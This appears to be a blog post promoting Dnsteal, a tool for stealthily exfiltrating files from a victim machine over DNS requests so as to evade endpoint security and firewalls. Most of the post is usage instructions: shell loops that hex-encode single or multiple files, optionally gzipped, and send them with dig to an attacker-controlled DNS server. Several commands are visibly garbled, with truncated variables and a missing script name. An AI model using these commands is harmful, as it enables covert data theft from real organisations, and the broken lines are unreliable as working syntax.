Data exfiltration, also called data extrusion, data exportation, or data theft is the unauthorized transfer of data from a computer or other device. Data exfiltration is primarily a security breach that occurs when an individual’s or organization's data is illegally copied. Generally, data exfiltration’s are targeted attacks where the hacker’s/cracker’s primary intent is to find and copy specific data from the target machine. Such a transfer may be manual and carried out by someone with physical access to a computer or it may be automated and carried out through malicious programming over a network. There are several methods for Data exfiltration but most of them will be blocked by the endpoint security systems and firewall/IPS implementations. A new tool has been released aiming primarily to bypass all such protections and transfer data through seemingly harmless DNS requests.


According to the author,Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests

Usage Instructions

Dnsteal is coded in python and available in GitHub. The author gives an example on how to use this tool in the below image.

To begin with the following command should be entered on the victim machine :

for b in $(xxd -p file/to/send.png); do dig @server $; done


Support for multiple files

Dnstool supports multiple files to be exfiltereted. Use as below.

for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$; done; done

gzip compression supported

It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:

python –z

Then on the victim machine send a Gzipped file like below:

for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $; done

For multiple, gzip compressed files use as below:

for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$; done; done

For more details head over to GitHub page

Post a Comment